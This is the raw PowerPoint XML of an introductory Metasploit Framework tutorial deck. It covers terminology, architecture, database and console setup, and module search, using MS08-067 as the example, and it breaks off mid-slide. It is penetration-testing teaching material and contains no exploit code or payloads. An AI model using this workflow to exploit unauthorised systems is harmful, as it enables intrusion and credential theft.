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58" r:id="rId4"/>
    <p:sldId id="266" r:id="rId5"/>
    <p:sldId id="267" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="270" r:id="rId8"/>
    <p:sldId id="260" r:id="rId9"/>
    <p:sldId id="261" r:id="rId10"/>
    <p:sldId id="262" r:id="rId11"/>
    <p:sldId id="263" r:id="rId12"/>
    <p:sldId id="275" r:id="rId13"/>
    <p:sldId id="271" r:id="rId14"/>
    <p:sldId id="272" r:id="rId15"/>
    <p:sldId id="273" r:id="rId16"/>
    <p:sldId id="274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68" r:id="rId36"/>
    <p:sldId id="269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599"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="108" d="100"/>
          <a:sy n="108" d="100"/>
        </p:scale>
        <p:origin x="736" y="1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AD4924-80F6-1744-B12F-7D1FB074332C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/4/17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F78EB0-032F-FD47-8B56-19F6DA6CB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05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0" y="5202238"/>
            <a:ext cx="9144000" cy="1655762"/>
          </a:xfrm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E631-D1DE-CA43-90A0-C7E80C2FC209}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/4/17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A178-2D66-5F4E-9D83-B4A4EFAB5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906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E631-D1DE-CA43-90A0-C7E80C2FC209}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/4/17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A178-2D66-5F4E-9D83-B4A4EFAB5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9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E631-D1DE-CA43-90A0-C7E80C2FC209}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/4/17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A178-2D66-5F4E-9D83-B4A4EFAB5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164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E631-D1DE-CA43-90A0-C7E80C2FC209}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/4/17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A178-2D66-5F4E-9D83-B4A4EFAB5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83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E631-D1DE-CA43-90A0-C7E80C2FC209}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/4/17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A178-2D66-5F4E-9D83-B4A4EFAB5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694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E631-D1DE-CA43-90A0-C7E80C2FC209}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/4/17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A178-2D66-5F4E-9D83-B4A4EFAB5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05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E631-D1DE-CA43-90A0-C7E80C2FC209}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/4/17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A178-2D66-5F4E-9D83-B4A4EFAB5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73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E631-D1DE-CA43-90A0-C7E80C2FC209}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/4/17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A178-2D66-5F4E-9D83-B4A4EFAB5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439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E631-D1DE-CA43-90A0-C7E80C2FC209}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/4/17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A178-2D66-5F4E-9D83-B4A4EFAB5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60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E631-D1DE-CA43-90A0-C7E80C2FC209}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/4/17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A178-2D66-5F4E-9D83-B4A4EFAB5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150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FE631-D1DE-CA43-90A0-C7E80C2FC209}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/4/17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1A178-2D66-5F4E-9D83-B4A4EFAB5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070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4" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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>
            <a:alphaModFix amt="67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89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6042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FE631-D1DE-CA43-90A0-C7E80C2FC209}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/4/17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1A178-2D66-5F4E-9D83-B4A4EFAB5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165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4">
              <a:lumMod val="60000"/>
              <a:lumOff val="4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mazon.com/Metasploit-Penetration-Testers-David-Kennedy/dp/159327288X" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/metasploit" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/egyp7" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/jduck" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/hermit_hacker" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cryptolingus.net/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.stackattack.net/blog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offensive-security.com/metasploit-unleashed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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Framework (MSF) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fundamentals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en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Module Type: Basic Method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Module Number: 0x02</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Last Updated: 2017-01-17</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Author: Hermit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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3740726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Part 1 of 3:  Startup through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploit/Payload Selection</a:t>
            </a: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28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Common Terminology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Framework?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MSF Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Component Familiarity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Initial Setup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MSF Console</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bonus console commands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146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Terminology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Vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A method of interaction which allows for an unintended action to occur in response to an unexpected, invalid, or otherwise unaccounted for input of some form.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploit (‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sploit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A piece of code that is designed to exploit a vulnerability to allow for an unintended action.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>There are three key module types in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: exploit modules, post-exploit modules, and auxiliary modules.  Exploit modules take advantage of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vulnerabities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to gain an initial foothold on the system.  Post-exploit modules collect information, escalate privileges, or otherwise expand upon the foothold achieved through an exploit module.  Auxiliary modules perform functions unrelated to exploitation.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353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Terminology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28600" lvl="1">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common Vulnerabilities and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exposures (CVE)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A CVE uniquely identifies a vulnerability.  A single patch or update may fix multiple vulnerabilities, or provide a vendor-specific reference.  For example, MS08-067 was the 67</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> update from Microsoft in 2008, and addressed CVE-2008-4250 (the 4,250</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vulnerability assigned a public CVE in 2008).  CVEs are cross-platform and cross-vendor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Encoder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An encoder obfuscates exploit (or other) code to make it more difficult to detect.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Platform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The operating system impacted by an exploit.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03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Terminology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Meterpreter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A Swiss army knife payload that allows for modular enhancement, routing, secondary exploitation, and control.  A solid first-choice.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An open connection to a remote system through which commands, modules, or network traffic may be directed or routed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Creds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>One or more credentials that have been recovered by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.  This may include hashes, usernames/passwords, or even PKI materials.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Loot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Slang for anything of value that is retrieved from a system (e.g. creds).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12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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Framework?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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Framework (MSF) is a way to easily mix and match exploits with payloads, and provides additional tools to facilitate exploitation activities.  It allows you to connect to multiple systems simultaneously, use a platform-agnostic control language, script exploitation attempts, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>weaponize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> disclosed exploits in a repeatable/consistent manner.  It also provides a management framework for loot, a shared environment for teams, and a wide variety of general tools (e.g. text editors, Ruby console, telnet, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>thir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>—party repositories, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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985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Use The MSF?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You enjoy sleep, and don’t have time to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>weaponize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> every disclosed exploit yourself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You’re learning about exploits, and need working examples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You perform penetration tests, and need a way for your team to remain stealthy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You need easily repeatable methods of exploiting systems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Your shellcode isn’t ninja level, and you can’t figure out how to compress multi-stage payloads into 24 bytes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You want to be like all the cool kids (they seem to fit in)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096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MSF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Architecture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In its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>most basic state the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Framework is just a Ruby program that loads modules and information at run time, then controls spawned processes.  More advanced uses include a database for the backend (which speeds up search times, makes loot storage persistent, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) and a daemon that allows multiple users to interact with compromised systems/sessions and recovered data at the same time.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094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Component Familiarity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msfconsole</a:t>
            </a:r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 err="1" smtClean="0"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is an interactive shell to access virtually all of the functionality of the MSF.  It is the most common starting point for new users to MSF, and provides built-in search, help, and guidance functionality.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msfupdate</a:t>
            </a:r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 err="1" smtClean="0"/>
              <a:t>msfupdate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> application reaches out via HTTPS to a common repository to update the MSF.  If you are using Kali Linux rolling (e.g. 2016.x) this generally isn’t required as the standard OS update process includes this.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msfdb</a:t>
            </a:r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 err="1" smtClean="0"/>
              <a:t>msfdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> application controls a PostgreSQL database backend.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msfd</a:t>
            </a:r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 err="1" smtClean="0"/>
              <a:t>msfd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> application is a daemon to allow for shared MSF access.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20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Setup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Setup the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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msfdb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start</a:t>
            </a:r>
            <a:b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</a:br>
            <a:endParaRPr lang="en-US" sz="1600" b="1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dirty="0" smtClean="0"/>
              <a:t>Initialize the database (first time only)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>msfdb</a:t>
            </a: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init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/>
            </a:r>
            <a:b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</a:br>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Update your MSF instance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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msfupdate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/>
            </a:r>
            <a:b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</a:br>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty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dirty="0" smtClean="0"/>
              <a:t>(Optional) Start the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msfd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to share an environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>m</a:t>
            </a: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sfd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/>
            </a:r>
            <a:b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</a:br>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty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dirty="0" smtClean="0"/>
              <a:t>Start the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea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808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MSF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Console - Navigation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Before we begin, we have to know where we are.  MSF uses a defined hierarchy to keep track of logical locations, which is broken out as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" smtClean="0"/>
              <a:t>type/platform/sub-platform/name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For example, the path “exploit/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>smb_relay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” means that we’re dealing with an exploit that targets SMB on Windows, and is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>smb_relay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> exploit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This is shown in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> prompt, and is blank when nothing is selected:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> &gt;                           #Nothing selected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> exploit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>smb_relay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>) &gt;        #The above exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="304393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MSF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Console - Navigation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Now that we know how to find where we are, let’s find an exploit to use.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> To start with, let’s find a payload for MS08-067, which is a Windows vulnerability for SMB.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>To search for an exploit, use the “search” command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>msf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 &gt; search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>smb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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Matching Modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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================</a:t>
            </a:r>
            <a:b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/>
            </a:r>
            <a:b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</a:b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   Name                                            Disclosure Date  Rank       Description  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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  ----                                            ---------------  ----       -----------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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  auxiliary/admin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>smb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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>samba_symlink_traversal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                      normal     Samba </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Symlink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...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>etc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07002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MSF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Console - Navigation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061032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That wasn’t very efficient. Let’s get some help on how can we make it better.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> &gt; help search</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Usage: search [keywords]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
